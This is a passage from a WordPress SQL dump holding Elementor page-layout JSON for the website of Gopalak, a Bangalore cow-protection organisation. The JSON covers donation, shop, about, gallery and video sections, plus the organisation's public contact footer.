"},{\"id\":1691,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-mark-stebnicki-2252557-scaled.jpg\"},{\"id\":1741,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-min-an-1455455-scaled.jpg\"},{\"id\":1742,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-roman-odintsov-8747798-scaled.jpg\"},{\"id\":1687,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-kelly-2881385-scaled.jpg\"}],\"thumbnail_size\":\"full\",\"slides_to_show\":\"1\",\"navigation\":\"none\",\"autoplay_speed\":1000,\"_margin\":{\"unit\":\"px\",\"top\":\"-10\",\"right\":\"12\",\"bottom\":\"-21\",\"left\":\"-12\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image-carousel\"}],\"isInner\":false},{\"id\":\"0468eb3\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"d5b9324\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#D5EBC1\"},\"elements\":[{\"id\":\"e372b45\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ce9e678\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73700aa\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":975,\"sizes\":[]},\"structure\":\"20\",\"background_background\":\"classic\",\"background_color\":\"#D5EBC1\"},\"elements\":[{\"id\":\"f55311d\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50,\"background_background\":\"classic\"},\"elements\":[{\"id\":\"8ea7d73\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/depositphotos_12743475-stock-photo-farm-cattle.webp\",\"id\":1567,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"custom\",\"title_text\":\"Adopt\\/Donate\",\"description_text\":\"You can donate any amount of your choice which will be used for fodder to feed cows.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#D5EBC1\",\"css_filters_css_filter\":\"custom\",\"title_color\":\"#43693F\",\"title_typography_typography\":\"custom\",\"title_typography_font_family\":\"Itim\",\"title_typography_font_weight\":\"600\",\"description_color\":\"#43693F\",\"description_typography_typography\":\"custom\",\"description_typography_font_family\":\"Itim\",\"description_typography_font_weight\":\"400\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"d6c2143\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#43693F\",\"_margin\":{\"unit\":\"px\",\"top\":\"-19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/donate\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5bb322c\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"9ea7478\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\",\"id\":1340,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"custom\",\"title_text\":\"Shop With Us\",\"description_text\":\"\\\"Cow is the source of progress and prosperity. In many ways it is superior to one\\u2019s mother\\\"\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#D5EBC1\",\"thumbnail_custom_dimension\":{\"width\":\"600\",\"height\":\"400\"},\"title_color\":\"#43693F\",\"title_typography_typography\":\"custom\",\"title_typography_font_family\":\"Itim\",\"title_typography_font_weight\":\"600\",\"description_color\":\"#43693F\",\"description_typography_typography\":\"custom\",\"description_typography_font_family\":\"Itim\",\"description_typography_font_weight\":\"400\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"cc6e4e9\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#43693F\",\"_margin\":{\"unit\":\"px\",\"top\":\"-19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7107c53\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"c67e6d7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e70fe37\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"11aef9e\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":904,\"sizes\":[]},\"structure\":\"22\"},\"elements\":[{\"id\":\"2d9f268\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"86a6968\",\"elType\":\"widget\",\"settings\":{\"title\":\"About Gopalak\",\"title_color\":\"#264D5D\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"aa78264\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br \\/>Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being<\\/p>\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"400\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"67983f0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8e299f1\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#43693F\",\"_margin\":{\"unit\":\"px\",\"top\":\"49\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/aboutus\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"23d3073\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"7d36be0\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e43f473\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":71,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1c1c876\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"background_background\":\"classic\",\"background_color\":\"#D8CDCD52\"},\"elements\":[{\"id\":\"4b90a4b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"dee4139\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=0wll4Km5AU8\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"97c7ffb\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f586793\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=bEyCT3KsAMQ\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"2f0ac23\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ec43a70\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=sVQg0-3WSc4\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ca8c599\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#D5EBC1\"},\"elements\":[{\"id\":\"f8ca017\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"da25a76\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"216af8d\",\"elType\":\"section\",\"settings\":{\"structure\":\"21\",\"background_background\":\"classic\",\"background_color\":\"#D5EBC1\"},\"elements\":[{\"id\":\"882c92e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"772bd0e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Gallery\",\"title_color\":\"#43693F\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fbf7c50\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\\"Cow is the source of progress and prosperity. In many ways it is superior to one\\u2019s mother\\\"<\\/p>\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"400\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2c59178\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"29d5b45\",\"elType\":\"widget\",\"settings\":{\"carousel\":[{\"id\":1340,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\"},{\"id\":1354,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\"},{\"id\":1339,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/cows-farming-on-green-meadow-260nw-1704884002-e1663753177624.webp\"},{\"id\":1355,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\"},{\"id\":1357,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\"}],\"autoplay_speed\":1000},\"elements\":[],\"widgetType\":\"image-carousel\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f9dd695\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#D5EBC1\"},\"elements\":[{\"id\":\"0f89775\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"66d5270\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ba24d1d\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"background_background\":\"slideshow\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/values.png\",\"id\":1654,\"alt\":\"\",\"source\":\"library\"},\"background_slideshow_gallery\":[{\"id\":1577,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/GOPALAK55.png\"},{\"id\":1544,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/gopalak-B1-copy.jpg\"}],\"padding\":{\"unit\":\"px\",\"top\":\"150\",\"right\":\"0\",\"bottom\":\"0150\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5007eb7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"c7f7d6b\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"\",\"id\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\",\"_margin\":{\"unit\":\"px\",\"top\":\"-10\",\"right\":\"0\",\"bottom\":\"-10\",\"left\":\"-10\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7410379\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#43693F\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"b43ead7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5282e6a\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"header_size\":\"h4\",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6d3c6b7\",\"elType\":\"widget\",\"settings\":{\"title\":\" #800 Spandana towers\\n<br>19th main roadr,  HSR Layout<br>2nd sector, near golden fresh super market<br>Bangalore, 560102<br>\\nContact : (+91)7411722844<br>\\nE-mail id: namaste@gopalak.in\\n\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false}]'),(11528,1916,'_elementor_page_assets','a:0:{}'),(11530,1917,'_elementor_edit_mode','builder'),(11531,1917,'_elementor_template_type','wp-page'),(11532,1917,'_elementor_version','3.7.8'),(11533,1917,'_wp_page_template','elementor_canvas');
INSERT INTO `wp_postmeta` VALUES (11534,1917,'_elementor_data','[{\"id\":\"2bcecd0\",\"elType\":\"section\",\"settings\":{\"structure\":\"70\",\"background_background\":\"classic\",\"background_color\":\"#43693F\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"08c3f0f\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"98c2def\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/cropped-GOPALAK-COIN-2.0.png\",\"id\":1906,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\",\"image_custom_dimension\":{\"width\":\"56\",\"height\":\"67\"},\"link_to\":\"custom\",\"width\":{\"unit\":\"%\",\"size\":87,\"sizes\":[]},\"height\":{\"unit\":\"px\",\"size\":99,\"sizes\":[]},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"3439158\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"f29b88a\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"049c5ad\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#D5EBC1\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"button_text_color\":\"#111111\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5af2fa6\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"59347f6\",\"elType\":\"widget\",\"settings\":{\"text\":\"shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#D5EBC1\",\"button_text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"db735bc\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"27f86d0\",\"elType\":\"widget\",\"settings\":{\"text\":\"Adopt\\/Donate\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/donate\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#D5EBC1\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"button_text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"4613375\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"36373ca\",\"elType\":\"widget\",\"settings\":{\"text\":\"About us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/aboutus\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#D5EBC1\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"button_text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b366bab\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"4c45b22\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#D5EBC1\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"button_text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"574c840\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"structure\":\"20\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/Frame.png\",\"id\":1693,\"alt\":\"\",\"source\":\"library\"},\"background_repeat\":\"no-repeat\",\"background_size\":\"initial\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-3\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"84647ad\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50},\"elements\":[{\"id\":\"4e75547\",\"elType\":\"widget\",\"settings\":{\"carousel\":[{\"id\":1690,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-mark-stebnicki-2602864-scaled.jpg\"},{\"id\":1689,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-kat-smith-735976-scaled.jpg\"},{\"id\":1691,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-mark-stebnicki-2252557-scaled.jpg\"},{\"id\":1741,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-min-an-1455455-scaled.jpg\"},{\"id\":1742,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-roman-odintsov-8747798-scaled.jpg\"},{\"id\":1687,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-kelly-2881385-scaled.jpg\"}],\"thumbnail_size\":\"full\",\"slides_to_show\":\"1\",\"navigation\":\"none\",\"autoplay_speed\":1000,\"_margin\":{\"unit\":\"px\",\"top\":\"-10\",\"right\":\"12\",\"bottom\":\"-21\",\"left\":\"-12\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image-carousel\"}],\"isInner\":false},{\"id\":\"0468eb3\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"d5b9324\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#D5EBC1\"},\"elements\":[{\"id\":\"e372b45\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ce9e678\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73700aa\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":975,\"sizes\":[]},\"structure\":\"20\",\"background_background\":\"classic\",\"background_color\":\"#D5EBC1\"},\"elements\":[{\"id\":\"f55311d\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50,\"background_background\":\"classic\"},\"elements\":[{\"id\":\"8ea7d73\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/depositphotos_12743475-stock-photo-farm-cattle.webp\",\"id\":1567,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"custom\",\"title_text\":\"Adopt\\/Donate\",\"description_text\":\"You can donate any amount of your choice which will be used for fodder to feed cows.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#D5EBC1\",\"css_filters_css_filter\":\"custom\",\"title_color\":\"#43693F\",\"title_typography_typography\":\"custom\",\"title_typography_font_family\":\"Itim\",\"title_typography_font_weight\":\"600\",\"description_color\":\"#43693F\",\"description_typography_typography\":\"custom\",\"description_typography_font_family\":\"Itim\",\"description_typography_font_weight\":\"400\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"d6c2143\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#43693F\",\"_margin\":{\"unit\":\"px\",\"top\":\"-19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/donate\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5bb322c\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"9ea7478\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\",\"id\":1340,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"custom\",\"title_text\":\"Shop With Us\",\"description_text\":\"\\\"Cow is the source of progress and prosperity. In many ways it is superior to one\\u2019s mother\\\"\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#D5EBC1\",\"thumbnail_custom_dimension\":{\"width\":\"600\",\"height\":\"400\"},\"title_color\":\"#43693F\",\"title_typography_typography\":\"custom\",\"title_typography_font_family\":\"Itim\",\"title_typography_font_weight\":\"600\",\"description_color\":\"#43693F\",\"description_typography_typography\":\"custom\",\"description_typography_font_family\":\"Itim\",\"description_typography_font_weight\":\"400\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"cc6e4e9\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#43693F\",\"_margin\":{\"unit\":\"px\",\"top\":\"-19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7107c53\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"c67e6d7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e70fe37\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"11aef9e\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":904,\"sizes\":[]},\"structure\":\"22\"},\"elements\":[{\"id\":\"2d9f268\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"86a6968\",\"elType\":\"widget\",\"settings\":{\"title\":\"About Gopalak\",\"title_color\":\"#264D5D\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"aa78264\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br \\/>Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being<\\/p>\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"400\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"67983f0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8e299f1\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click 